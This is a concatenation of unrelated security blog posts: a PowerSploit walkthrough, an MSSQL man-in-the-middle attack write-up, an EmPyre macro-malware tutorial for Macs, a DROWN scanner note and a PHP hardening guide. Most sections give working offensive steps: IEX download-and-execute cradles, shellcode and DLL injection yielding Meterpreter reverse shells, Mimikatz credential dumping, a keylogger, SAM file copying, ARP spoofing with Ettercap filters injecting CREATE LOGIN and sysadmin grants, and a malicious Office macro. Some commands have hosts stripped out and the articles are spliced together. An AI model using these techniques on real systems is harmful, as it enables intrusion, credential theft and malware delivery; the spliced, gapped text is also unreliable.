PowerShell Toolkit: PowerSploit

PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test.


To follow along with the article please download the latest version of PowerSploit available here: https://github.com/PowerShellMafia/PowerSploit

If you have GIT, then you can simply run the following command to get all files from the github repository:

To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions.

Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it.

For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python:

python -m SimpleHTTPServer

Now all the files in the PowerSploit directory can easily be accessed over http://<ip_address&gt;:8000/

PowerSploit has categorized all the scripts in a pretty clear and organized manner:

Category Description
Antivirus Bypass Find bytes of a file which has a matching signature in antivirus.
Code Execution Used to execute code on victim machine.
Exfiltration Manipulate and collect information & data from victim machine(s).
Persistence Maintain control to machine by adding persistence to scripts.
PE Tools Handy PowerShell cmdlets for enumeration.
Recon Perform reconnaissance tasks using victim machine.
Reverse Engineering Help perform reverse engineering & malware analysis. It has now been moved to PowerShellArsenal.
Script Modification Create and manipulate scripts on victim machine.

In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration).

Install and run a PowerShell script:

IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”)

This command when run in PowerShell will install that PowerShell for the current process of PowerShell only.


This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk.

We can easily install the Code Execution PowerShell script “Invoke-ShellCode” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Run the above command in a PowerShell window to install “Invoke-Shellcode” script.

To get some information about the module type:

Get-Help Invoke-Shellcode

Inject payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell:

Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost -Lport 4444 -Force

Also we had setup a Multi Handler exploit and compatible payload in Metasploit. Executing the above PowerSploit script will give us a Meterpreter shell.

Please note that at the time of writing this article, only two Metasploit payloads are supported:

  1. windows/meterpreter/reverse_http
  2. windows/meterpreter/reverse_https

If you want to inject into some other process, you can either create a new process and then inject in it or inject inside an existing process.

Inject in an existing process:

Get Process ID (PID) of a process using “Get-Process”.

Note that the “Id” field is the Process ID (PID) of the corresponding process name.

Inject the Metasploit payload into “svchost” process with PID 1228. Note that I have removed “-Force” switch from the command, due to which it is asking for user confirmation now before injecting payload.

After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below:

Inject in a new process:

Create a new hidden process and inject the payload into it:

Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden

And we got a Meterpreter shell on the attacking machine:


This cmdlet is used to inject a DLL file into an existing process using its Process ID (PID). Using this feature, a DLL can easily be injected in processes. The only disadvantage with this cmdlet is that it requires the DLL to be written on the disk.

We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Generate the Metasploit Meterpreter DLL and download it on the server:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll > msf.dll

Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice.

Create a process in hidden mode and inject the DLL into it.

Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden

Invoke-DllInjetion -ProcessID 2240 -Dll c:\users\master\Desktop\msf.dll

We received a successful Meterpreter shell on the attacking machine:


This cmdlet is used to split a file into specific byte sizes. The split bytes are stored in separate files, which will be detected by the installed antivirus and quarantined or removed. By noting the removed files, we can easily find the parts of file which have the AV signature.

We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Running “Find-AVSignature” on a Meterpreter Windows executable:

Find-AVSignature -StartByte 0 -EndByte 6144 -Interval 50 -Path C:\test\exempt\nc.exe -OutPath c:\users\master\Desktop\msf.exe -OutPath c:\users\master\Desktop\run1 -Verbose

The installed antivirus detected malicious files and we can see bytes with the AV signature:

Now we can see the bytes of “msf.exe” containing AV signatures.


This cmdlet can be used to find the path at which an executable looks for the DLL we are querying for. For example, we want to know at what location “cmd.exe” is looking for the “shell32.dll” DLL file. Using this information, we can replace the original DLL with a malicious DLL and get it executed to receive a reverse shell or any other task. This technique can be very useful for privilege escalation.

We can easily install the PE Tools PowerShell script “Find-DllLoadPath” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Find where “Acrobat.exe” loads “shell32.dll” DLL from:

Get-DllInjection –ExecutablePath “C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe” –Dllname shell32.dll


This cmdlet is used to run a port scan on other hosts and find open ports. You will find a number of similarities between Nmap and this cmdlet, but not all.

We can easily install the Recon PowerShell script “Invoke-Portscan” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Run a port scan for a list of hosts and ports:

Invoke-Portscan -Hosts,,, -Ports “23,22,21,8080,8000,3389”

There are a number of options using which you can customize the port scan. Use “Get-Help Invoke-PortScan –full” for all options.

It also supports saving output in files just like Nmap (GNMAP, NMAP and XML) using -oG, -oX and -oA switches respectively.


This cmdlet is used to find the DNS PTR record for corresponding IP address(es).

We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Execute the cmdlet using the below command which accepts IP or IP range in “-IpRange” switch:

Invoke-ReverseDnsLookup -IpRange <IP_Address/Range>

Unfortunately, it does not support comma separated values or file input of ranges like

It accepts only single IP or CIDR format for IP range.


This cmdlet is used to dictionary a web server to find HTTP Status of a path or file on HTTP/HTTPS service. It is not very feature rich and does not support a nested dictionary attack. It accepts a file containing path name or file name to check for HTTP Status on a web server.

We can easily install the Recon PowerShell script “Get-HttpStatus” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Execute this cmdlet using the following command (the dictionary file is that of DirBuster):

Get-HttpStatus -Target -Path c:\users\master\Desktop\directory-list-2.3-small.txt

If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests:

Get-HttpStatus -Target -Path c:\users\master\Desktop\directory-list-2.3-small.txt -UseSSL

If the service is running on some other port like 8080, 8000, etc, for defining a port use the “-Port” switch.

Get-HttpStatus -Target -Path c:\users\master\Desktop\directory-list.txt -Port 8080

It is not as good as the DirBuster tool, but it’s good to have the PowerShell script too.


This cmdlet is used to find Unicode or ASCII characters in a file. It is similar to what we have in UNIX based systems, the “strings” utility.

We can easily install the Reverse Engineering PowerShell script “Get-Strings” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Get-Strings -Path <file_name_with_path>

It is similar to the “strings” utility that we have in Linux. But here we have it for PowerShell 

Note that Reverse Engineering has been moved from PowerSploit to PowerToolsArsenal (https://github.com/mattifestation/PowerShellArsenal) now.


This cmdlet is a port of the original Mimikatz project in PowerShell. The benefit of using this over the Mimikatz executable is that it remains in memory. It can be used to dump credentials, certificates, etc from the local computer or other computers in the domain.

It is one of the most useful PowerSploit tools in a penetration testing engagement.

We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Dump credentials using: Invoke-Mimikatz -DumpCreds

You can even dump credentials and certificates of other computers using -ComputerName @(“computer1,….)


This cmdlet is used to log the keystrokes which are pressed on the victim machine. It can be used as a keylogger. But all the logged keystorkes are stored in a local file on default (temp directory) or custom location.

We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

This cmdlet can be executed using the following command:

Get-Keystrokes -LogPath c:\users\master\desktop\keylogger.txt

Key log is stored in: c:\users\master\desktop\keylogger.txt

This script also supports “-CollectionInterval” using which you can define after how many minutes keystrokes should be captured. Do note that the key logging is very detailed, containing pressed button, username, application name and timestamp.


This cmdlet is used to copy protected files which cannot be copied when the operating system is running.

We can easily install an Exfiltration PowerShell script “Invoke-NinjaCopy” using:

IEX (New-Object Net.WebClient).DownloadString(“”)

Execute “Invoke-NinjaCopy” using the following the command to copy the protected “SAM” file:

Invoke-NinjaCopy -Path “C:\Windows\System32\config\SAM” -LocalDestination “C:\Users\master\Desktop\SAM”

When you try to perform the same operation using the “copy” command, the file cannot be copied:

Hacking Microsoft SQL Server Without a Password

During a recent penetration test, I was performing some packet captures and noticed  some unencrypted Microsoft SQL Server (MSSQL) traffic.  The syntax was unmistakable.  At first I thought this might be a way to capture some authentication credentials.  However, MSSQL encrypts login traffic which meant I would have to crack the encryption to get credentials.  If the installation uses a self-signed certificate, that is fairly easy to crack.

Unfortunately, for this particular client engagement, cracking SQL Server encryption was beyond the scope of the project.  So, I had to set my curiosity aside for the time being and complete the penetration test for the client.  However, I could not help thinking I was on to something.  Was there a way to attack a SQL Server box without any credentials? I decided to take my hypothesis to the lab and try some experiments.

What I found was that with a little packet hacking, I could take control of a Microsoft SQL Server box without having any stolen credentials using a Man in the Middle style attack.

Man in the Middle

Back in my lab, I began to research this more. For my investigation, I was running MSSQL Server 2014 Express on Windows Server 2012 R2. The client machine was a Windows 10 system running MSSQL Management Studio 2014. My attack machine was a relatively new installation of Kali 2.0 Linux. All of these systems are on the same subnet, simulating an attacker on the internal network. This was nearly identical to the setup I had at the client site.

This type of attack is known as a man-in-the-middle (MITM) attack. Anitian does these a lot, as we have a lot of expertise on hacking infrastructure devices.  The typical setup is to perform some kind of redirect, like an ARP cache poison (which is still possible in some environments), which forces traffic between two systems to be redirected through the attacker’s computer. This allows the attacker to not only see all of the data between the victims, but potentially also to manipulate that traffic.

This was exactly what I wanted to do.

Understanding the Data

The first thing I needed to do was to look at the MSSQL query traffic. In order to make this test more interesting, I used the “SA” account to login. The SA account is the system admin account in SQL Server and can do anything. If my experiments were successful, I could do a lot of fun things with the SA account’s privileges.


Once logged in, I launched Wireshark 2.0 on the SQL Server box. It started capturing traffic on the primary interface. I configured Wireshark to use a display filter “tds.query”. This hides all the other traffic and displays just the TDS query packets. (Incidentally, I noticed that the “tds.query” filter object is not available on older versions of Wireshark.)

With a traffic capture underway, I switched back to the workstation and executed a query against the sample database I built for this test. The database is called testdb and includes one table called Products. The Products table has two columns named ProductID and ProductName. There is no actual data in the table, but for this test that is unnecessary. This query is designed to pull all information from the database table.


The query was executed successfully and the empty table was returned to me. You can see the empty columns listed toward the bottom-right of the screenshot. Switching back to Wireshark, I stopped the capture and looked at the captured data. I spotted one TDS query packet. Clicking on that packet showed me all of the data contained within. MSSQL Server 2014 Express did not have encryption enabled by default, so this data was easy to access.


Looking at the decoded data at the bottom of the center pane, it is easy to identify the query. It even includes the carriage return and newline characters. Something interesting to notice is that in between each character of the query is a null byte (hexadecimal 0x00) which is normal for Unicode. This is only noticeable when looking at the raw data in the bottom pane. Wireshark displays these bytes as period characters but really, they are null. This meant that I couldn’t just look for a simple string like “select”. I’d have to take those Unicode null bytes into consideration when searching for the data later, and for when I ultimately try to replace it with my own data.

Fun with Ettercap Filters

Now that I knew what the data looked like, I could try to find a way to manipulate it. I decided to use Ettercap. Ettercap is a tool specifically designed to perform MITM attacks. It also has a nifty built-in feature called Ettercap filters. A filter would allow me to search the packets for specific data and then manipulate that data. You just write the filter and load it into Ettercap. Then Ettercap automatically replaces data every time it finds a match. The functionality is somewhat limited, but it should work for proof of concept.

The filters are written in a simple scripting language. The important functions I intended to use were the search and replace functions. The search function will search for specific data within the packets. The replace function will actually search for data and then replace it with other data. That was the key to this project.

Since the TDS query data includes those null bytes, some of the characters are not printable. This meant that I could not merely search for a simple string and replace it with another string. I needed a way to search for a non-printable null byte. Since I cannot type null on a keyboard, I needed another way. Fortunately, Ettercap filters support hexadecimal using “\x” to escape. For example, to search for the letter ‘s’, I can tell Ettercap to search for “\x73”. The null bytes are easily searchable now by searching for “\x00”. Kali includes a program called hexdump that can be used to convert strings to hexadecimal. I used this to convert the string “select” to hex.


Once I had the data I needed, I wrote the first test filter and called it “mssql.filter”.


The first line ensures that the filter will only run on TCP traffic with a destination port of 1433. If this matches, the filter will output a debugging message to the console to let me know that it found SQL traffic. This is just for my own peace of mind so I know it’s at least partially working. The next “if” statement searches for a string of hex data. This data translates to “select” with null bytes in between each character. If the filter locates that string, it will output another debugging message to the console.

Finally, the magic happens. The replace command swaps that exact string with a different string of “ssssss” including the required null bytes. This was just a test to see if the script would run properly. It is important to note that when you replace data in a TCP packet, you must replace it with the exact same number of bytes. If the size of the packet changes, the TCP connection will break.

Once the filter is written, it must be compiled. This is easily accomplished with the etterfilter command.


There were no errors, so the filter was now ready for testing. I fired up the Ettercap graphical interface and launched an ARP spoofing attack against the MSSQL server and the client workstation with sniffing enabled. I fired up Wireshark and verified that I was seeing traffic being sent between the two victims. Then in Ettercap I went to “Filters -> Load a filter” and chose my filter. I was rewarded with a “Content filters loaded” message down in the Ettercap console. Almost immediately I was receiving “SQL Traffic Discovered” messages as well. Everything was looking positive.

The next step was to switch back to the workstation and try executing the query. If it goes according to plan, the “select” string should be replaced with “ssssss” and break the query. I executed the query, but this time I did not receive the empty table result like I did originally. Instead, I received an error.


“Incorrect syntax near ‘ssssss’.” That’s perfect! The filter worked exactly as expected. It replaced the “select” string with “ssssss”. The MSSQL server did not know how to handle that and returned an error. That was one step in the right direction. The next step was to replace the entire query string with something that will help me as the attacker.

Create the Login

I decided to try to add a login to the server. This would be pretty much the best possible scenario for me as an attacker, especially since in this case the workstation victim is logging in as the SA user. In order to add a login, I would have to submit this query to the MSSQL server:

CREATE LOGIN anitian WITH PASSWORD=’YouGotHacked1#’;

This would add a user to the MSSQL server called “anitian” with the password “YouGotHacked1#”. After converting everything to hex, I updated the mssql.filter file to contain the new data.


This filter will search for the string “select ProductID, ProductName from Products where ProductID=1;” and then replace it with the string “CREATE LOGIN anitian with PASSWORD=’YouGotHacked1#’”. I mentioned earlier that you must replace TCP data with the exact same amount of data. So how did I handle that since my new query is shorter than the original? I just added some spaces to the end of my new query with the null bytes surrounding them. This would ensure that the TCP packet stayed the same size, but the spaces wouldn’t interfere with my query being executed successfully. I compiled the filter just like before and then loaded it up into Ettercap. Then I submitted the query from the workstation.


Notice the difference between this response and the response before I used the Ettercap filter? Originally, the query returned an empty table. This time, no table was returned. Instead, the server returned a message, “Command(s) completed successfully.” If a database administrator saw this, they would likely dismiss it as some strange error. Unfortunately, they would be too late. I just added my own account to the database system. Now, the real hack was about to take place.

From the Windows 10 workstation I logged out of the SA account and then attempted to log in using my (hopefully) newly created anitian account.



SUCCESS! I was now logged in with my own account. Unfortunately this account did not have a lot of rights, so I could not do much.  However, that could be solved.  The next step would be to prepare another Ettercap filter to adjust my account’s rights and then perform a second SQL query injection attack.

At this point, I could have easily done all this, but it is rather tedious to do all the hex conversions by hand, and then add all of those null bytes and such. Who wants to go through all of that effort? This was a good enough proof of concept right?

No way! I was not about to give up that quickly.  Besides, why do all that tedious work, when I can automate the entire process using a script!

Automating the Hack

The SQLinject.sh shell script can be downloaded here:


This script automates the entire process from converting the SQL queries to hex all the way to performing the ARP spoofing and loading the Ettercap filter. It makes the process extremely easy.

In order to use the script you need four pieces of information.

  • The IP address of the MSSQL server
  • The IP address of the MSSQL client
  • The original query you want to replace
  • The new query you want to inject

In this case, I already knew everything except for the SQL query I wanted to inject. I knew I wanted to give the anitian user sysadmin privileges. After a quick lesson in SQL commands, I was able to design with the correct query:


This would add my new anitian user to the sysadmin role on the server, giving me access to pretty much anything I want. Now that I had all four key pieces of information, I ran the script like this:

./SQLInject.sh –o “select ProductID, ProductName from Products where ProductID=1;” –i “ALTER SERVER ROLE sysadmin ADD MEMBER anitian;” –s –c –f mssql.filter

Using the script, I do not have to worry about those pesky hex conversions or null bytes. The script handles it all for me. It will perform the conversions and then output an Ettercap filter to mssql.filter (The filename is based on the –f flag). From there, it runs etterfilter and compiles the filter into mssql.filter.ef. Finally, the script even loads up the command line interface to Ettercap, performs the ARP spoofing attack against the server and workstation and loads the filter! It will even compare the length of the old query and the new query and warn you if the new query is too long. And if the queries are not an identical length, it will pad the new one with spaces to make them identical in length! One single command does everything for me.

I executed the script and then switched over to the workstation. I then ran the familiar select query and noticed that I once again received the “Command(s) completed successfully” message. This was a good sign for the attack. I logged out of the SA account and logged back in as anitian.


Ta da! You can see in the screenshot that the anitian account is now a sysadmin user. With this level of access I can do whatever I want with the system. It gives me a great pivot point to start attacking other systems on the network.  Of course, that assumes this database does not already contain what I am looking for like payment card numbers or personally identifiable information.

The biggest downfall to this script is that it requires you to know the original SQL query before it actually happens. Luckily, SQL servers often have batch jobs or queries that are executed regularly or on a set schedule. Watching a Wireshark capture over a period of time should result in at least one query you can target. Of course I could always turn this into a more full-fledged program that performs the MITM attack on its own and then actually proxies the traffic, searching for TDS query packets by type and then automatically replacing the data without the need to know the original query beforehand…but that’s a project for another day.

Defending Against SQL MITM Attacks

Man in the middle attacks such as this can be devastating.  As you can see, I was able to gain complete access to a critical system.  A focused hacker may not follow some of the scientific processes I did.  Moreover, they could automate this and do it repetitively for hours or days, waiting for just the right conditions.

The simplest way to prevent this attack is to require encryption on all database connections. However, merely enabling encryption might not be sufficient.  Clients can negotiate the connection with no encryption if it is not required. Also ensure that you use a valid, trusted certificate. An attacker could easily spoof a self-signed certificate.

Another defense is to ensure remote queries never use accounts with elevated privileges, such as the SA account.  All database queries, especially the programmatic ones, should use an account with the absolute least amount of access they need to do the job.  This ensures that if the attacker is able to take over a connection, they cannot use that connection to forge accounts, like I did in this test.

Lastly, ensure your infrastructure is patched regularly.  Also, segment and isolate database systems from the corporate network.  These are best practices that also make MITM type attacks very difficult (if not impossible) to execute.


Hacking Mac With EmPyre

Hacking Mac With EmPyre

I am the stereotypical Apple fan boy that other bloggers write about. We have MacBook Pro’s, Air’s, Apple TV’s, iPhone’s and iPad’s and even subscribe to Apple Music. You literally couldn’t find someone who has become more brainwashed by a brand…BUT, I am still not blinded by the security misconceptions which are rife within the world of Mac users.

To try and understand just how wide spread these misconceptions were I recently did a poll on a facebook group dedicated to Mac products and asked the following question:

Do you think Mac/iMacs need an AntiVirus?

The results were staggering and showed that over 90% of participants (There were over 150 participants before the post was removed by an Admin because he wouldn’t entertain any talk of Mac’s having AV) believed that Mac’s do not need an AV. The comments were even more staggering and filled with all kinds of crazy talk from “Mac’s cannot get malware” through to “Malware  can only infect your Mac if you enter your admin password” and even went into heated debates debating the differences between Trojans, Viruses and Worms and which impacted Mac users.

Of course the bottom line was that almost nobody really understood that the risks are just as real on Mac as they are on Windows, just less common. Mac users get unwanted software, viruses, trojans and can be hacked, and with a little help from Adaptive Threat, we are going to prove it.

So, lets have some fun and look at how to hack into Mac OSX hosts using Social Engineering and Malicious Office Documents.

Introducing EmPyre

edit: I added a new video tutorial to walk through the whole blog below..

EmPyre is a Post Exploitation framework built using Python which offers Ethical Hackers & Baddies(don’t do it) the ability to remotely access OSX hosts. It’s easy to use, has OSX Specific exploits and payloads already built in, and it actually makes for a refreshing change from Metasploit. Visit them on Github to read the nitty gritty about features and support.

Installation is easy from another Unix host like Kali which comes with Git installed already. If you are using OSX or another distro, make sure you have Git installed before you begin. I’m using a fresh Kali install.

Install EmPyre

First, Git Clone from https://github.com/adaptivethreat/EmPyre/EMPYRE1

You should now have a folder called EmPyre,  and you’ll want to run install.sh to finish the install.empyre2

That’s it, EmPyre is installed and ready to go, now just change directory in to EmPyre and run ./empyre to launch the interface.


Once you do that, EmPyre will load up and you will see the following menu.


Create A Listener

Before you do anything, type the help command and check out the options you have, i’d suggest spending some time learning what you can do with the tool. For now, we want to start a listener for our victims to connect back too (y’know – the Macs that don’t need AV).

Go to the listeners menu…and type options to view the current listener options. This is your equivalent of “show options” within Metasploit.


When you hit enter you will see the current settings for the default listener which is called test. You can see the local IP and all the other options which are fine for this guide but you can change anything that suits your objective.


Now, if you decide to get a little fruity here, it’s on you, but to change any of these, you’ll want to set one of the fields and change it accordingly. For instance, changing the host is useful if you are wanting to NAT your IP and go out over the internet like some kind of savage.


Once you are happy with your options, just hit run , followed by your listener name which you can see in the options.


Thats it, we are listening for shells. Now, if you are running this in a lab, just make sure you can reach the target machine and networking is all good. If you are using this against a remote host outside of your LAN, then you should move on to configuring NAT and any rules you need to let the traffic come in. You’re on your own with that.

Create The Malicious Document

This is not so different to attacking windows machines but you’re gonna have the extra helping hand from EmPyre to make things a little easier. First, we need to create the malicious office macro. You can return to the main menu by entering “main” and then we want to enter “usestager“. You can press tab to list all the available options but we will be using a macro for this attack.


Almost there… now, we just need to tell the stager which listener we want it to use which should be easy since we only have 1 created, and then we wrap it up by generating the macro.empyre10If all goes to plan, you should see the macro outputted to the screen(unless you set an output location in the options)


We want to copy this output into an office document and enter into a macro. Open excel or word and save the document as a macro enabled document.


Once you have saved it, head over to tools and create a new macro, name it and then paste the code from your EmPyre host into the Macro. It should look like this.


(Note – If you are targeting x64 architecture you will need to edit the first line to begin “Private Declare PtrSafe Function”)

Save the document and let the games begin. The next time you open this document you should be prompted to enable macros which of course we will (why wouldn’t we!).


Once you hit Enable Macros… Excel will play ball and execute the macro hidden away inside Excel. Over in the attack machine we can see the fruits of our labour with an agent checking in. This can sometimes take a second but no more than around 10-15 seconds.


You’re going to want to then begin interacting with your newly infected Mac host. EmPyre calls them agents, so just enter the agents command.


Notice the string which begins UKFOM…. this is the unique identifier EmPyre has given the host. In order to interact with that host you just need to type the following, but remember to substitute the identifier for whatever yours is called.(you can rename it)


From here, you can start throwing shell code around like some kind of maniac. Try some of the built in modules, there are tons of them and some of them are pretty useful. My personal favourite is troll/osx/say but if you want to list them all, just use tab complete on the end of  usemodule


Of course, like every other screen you can issue the help command and see all the other options you have. Why not drop into the victims Shell, query the sysinfo or execute python code directly onto the host?


And that’s it, now go pop some Macs.

But first, lets take a moment to think about the original question. Do Macs need AntiVirus? Malware might not be as prolific on OSX as it is on Windows, but the concept is the same. Attackers can gain access to your machines in almost the same way they do Windows hosts. Some might argue that AV is not effective against targeted attacks, and I would agree, but right now, attacks are becoming more and more sophisticated and with the rise of OSX users, it’s only a matter of time before we see a shift in Apple users becoming bigger targets.


The Awesome Pentest Tool Series – public_drown_scanner

DROWN is a serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the essential cryptographic protocols for internet security. These protocols allow everyone on the internet to browse the web, use email, shop online, and send instant messages without third-parties being able to read the communication.

DROWN allows attackers to break the encryption and read or steal sensitive communications, including passwords, credit card numbers, trade secrets, or financial data. Our measurements indicate 33% of all HTTPS servers are vulnerable to the attack.

How to install

step 1 : chmod +x scanner.py

step 2 : sudo apt-get install tcpdump python-enum python-pyasn1 scapy python-crypto

step 3 : pip install scapy-ssl_tls

How to usage example

 scanner.py localhost 443... scanner.py localhost 587 -esmtp... scanner.py localhost 143 -imap... scanner.py localhost 25 -esmtp... scanner.py localhost 110 -pop3... scanner.py localhost 443 -bare

Demo :

25 PHP Security Best Practices For Sys Admins

PHP is an open-source server-side scripting language and it is a widely used. The Apache web server provides access to files and content via the HTTP OR HTTPS protocol. A misconfigured server-side scripting language can create all sorts of problems. So, PHP should be used with caution. Here are twenty-five php security best practices for sysadmins for configuring PHP securely.

Our Sample Setup For PHP Security Tips

  • DocumentRoot: /var/www/html
  • Default Web server: Apache ( you can use Lighttpd or Nginx instead of Apache)
  • Default PHP configuration file: /etc/php.ini
  • Default PHP extensions config directory: /etc/php.d/
  • Our sample php security config file: /etc/php.d/security.ini (you need to create this file using a text editor)
  • Operating systems: RHEL / CentOS / Fedora Linux (the instructions should work with any other Linux distributions such as Debian / Ubuntu or other Unix like operating systems such as OpenBSD/FreeBSD/HP-UX).
  • Default php server TCP/UDP ports: none
Most of the actions listed in this post are written with the assumption that they will be executed by the root user running the bash or any other modern shell:
$ php -v
Sample outputs:
PHP 5.3.3 (cli) (built: Oct 24 2011 08:35:41)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
For demonstration purpose I’m going to use the following operating system:
$ cat /etc/redhat-release
Sample outputs:
Red Hat Enterprise Linux Server release 6.1 (Santiago)

#1: Know Your Enemy

PHP based apps can face the different types of attacks. I have noticed the different types of attacks:
  1. XSS – Cross-site scripting is a vulnerability in php web applications, which attackers may exploit to steal users’ information. You can configure Apache and write more secure PHP scripts (validating all user input) to avoid xss attacks.
  2. SQL injection – It is a vulnerability in the database layer of an php application. When user input is incorrectly filtered any SQL statements can be executed by the application. You can configure Apache and write secure code (validating and escaping all user input) to avoid SQL injection attacks. A common practice in PHP is to escape parameters using the function called mysql_real_escape_string() before sending the SQL query.
  3. File uploads – It allows your visitor to place files (upload files) on your server. This can result into various security problems such as delete your files, delete database, get user details and much more. You can disable file uploads using php or write secure code (like validating user input and only allow image file type such as png or gif).
  4. Including local and remote files – An attacker can open files from remote server and execute any PHP code. This allows them to upload file, delete file and install backdoors. You can configure php to disable remote file execution.
  5. eval() – Evaluate a string as PHP code. This is often used by an attacker to hide their code and tools on the server itself. You can configure php to disable eval().
  6. Sea-surf Attack (Cross-site request forgery – CSRF) – This attack forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

#2: Find Built-in PHP Modules

To see the set of compiled-in PHP modules type the following command:
# php -m
Sample outputs:
[PHP Modules]
[Zend Modules]
I recommends that you use PHP with a reduced modules for performance and security. For example, you can disable sqlite3 module by deleting (removing) configuration file , OR renaming (moving) a file called /etc/php.d/sqlite3.ini as follows:
rm /etc/php.d/sqlite3.ini
mv /etc/php.d/sqlite3.ini /etc/php.d/sqlite3.disable
Other compiled-in modules can only be removed by reinstallating PHP with a reduced configuration. You can download php source code from php.net and compile it as follows with GD, fastcgi, and MySQL support:
./configure --with-libdir=lib64 --with-gd --with-mysql --prefix=/usr --exec-prefix=/usr \
--bindir=/usr/bin --sbindir=/usr/sbin --sysconfdir=/etc --datadir=/usr/share \
--includedir=/usr/include --libexecdir=/usr/libexec --localstatedir=/var \
--sharedstatedir=/usr/com --mandir=/usr/share/man --infodir=/usr/share/info \
--cache-file=../config.cache --with-config-file-path=/etc \
--with-config-file-scan-dir=/etc/php.d  --enable-fastcgi \

#3: Restrict PHP Information Leakage

To restrict PHP information leakage disable expose_php. Edit /etc/php.d/secutity.ini and set the following directive:
When enabled, expose_php reports to the world that PHP is installed on the server, which includes the PHP version within the HTTP header (e.g., X-Powered-By: PHP/5.3.3). The PHP logo guids (see example) are also exposed, thus appending them to the URL of a PHP enabled site will display the appropriate logo. When expose_php enabled you can see php version using the following command:
$ curl -I http://www.cyberciti.biz/index.php
Sample outputs:
HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3
Content-type: text/html; charset=UTF-8
Vary: Accept-Encoding, Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=wikiToken;string-contains=wikiLoggedOut;string-contains=wiki_session
Last-Modified: Thu, 03 Nov 2011 22:32:55 GMT
I also recommend that you setup the ServerTokens and ServerSignature directives in httpd.conf to hide Apache version and other information.

#4: Minimize Loadable PHP Modules (Dynamic Extensions)

PHP supports “Dynamic Extensions”. By default, RHEL loads all the extension modules found in /etc/php.d/ directory. To enable or disable a particular module, just find the configuration file in /etc/php.d/ directory and comment the module name. You can also rename or delete module configuration file. For best PHP performance and security, you should only enable the extensions your webapps requires. For example, to disable gd extension, type the following commands:
# cd /etc/php.d/
# mv gd.{ini,disable}
/sbin/service httpd restart

To enable php module called gd, enter:
# mv gd.{disable,ini}
/sbin/service httpd restart

#5: Log All PHP Errors

Do not expose PHP error messages to all site visitors. Edit /etc/php.d/security.ini and set the following directive:

#6: Disallow Uploading Files

Edit /etc/php.d/security.ini and set the following directive to disable file uploads for security reasons:
If users of your application need to upload files, turn this feature on by settingupload_max_filesize limits the maximum size of files that PHP will accept through uploads:
# user can only upload upto 1MB via php

#7: Turn Off Remote Code Execution

If enabled, allow_url_fopen allows PHP’s file functions — such as file_get_contents() and the include and require statements — can retrieve data from remote locations, like an FTP or web site.
The allow_url_fopen option allows PHP’s file functions – such as file_get_contents() and the include and require statements – can retrieve data from remote locations using ftp or http protocols. Programmers frequently forget this and don’t do proper input filtering when passing user-provided data to these functions, opening them up to code injection vulnerabilities. A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering. Edit /etc/php.d/security.ini and set the following directive:
I also recommend to disable allow_url_include for security reasons:

#8: Enable SQL Safe Mode

Edit /etc/php.d/security.ini and set the following directive:
If turned On, mysql_connect() and mysql_pconnect() ignore any arguments passed to them. Please note that you may have to make some changes to your code. Third party and open source application such as WordPress, and others may not work at all when sql.safe_mode enabled. I also recommend that you turn off magic_quotes_gpc for all php 5.3.x installations as the filtering by it is ineffective and not very robust. mysql_escape_string() and custom filtering functions serve a better purpose (hat tip to Eric Hansen):

#9: Control POST Size

The HTTP POST request method is used when the client (browser or user) needs to send data to the Apache web server as part of the request, such as when uploading a file or submitting a completed form. Attackers may attempt to send oversized POST requests to eat your system resources. You can limit the maximum size POST request that PHP will process. Edit /etc/php.d/security.ini and set the following directive:
; Set a realistic value here 
The 1K sets max size of post data allowed by php apps. This setting also affects file upload. To upload large files, this value must be larger than upload_max_filesize. I also suggest that you limit available methods using Apache web server. Edit, httpd.conf and set the following directive for DocumentRoot /var/www/html:
<Directory /var/www/html>
    <LimitExcept GET POST>
        Order allow,deny
## Add rest of the config goes here... ##

#10: Resource Control (DoS Control)

You can set maximum execution time of each php script, in seconds. Another recommend option is to set maximum amount of time each script may spend parsing request data, and maximum amount of memory a script may consume. Edit /etc/php.d/security.ini and set the following directives:
# set in seconds
max_execution_time =  30
max_input_time = 30
memory_limit = 40M

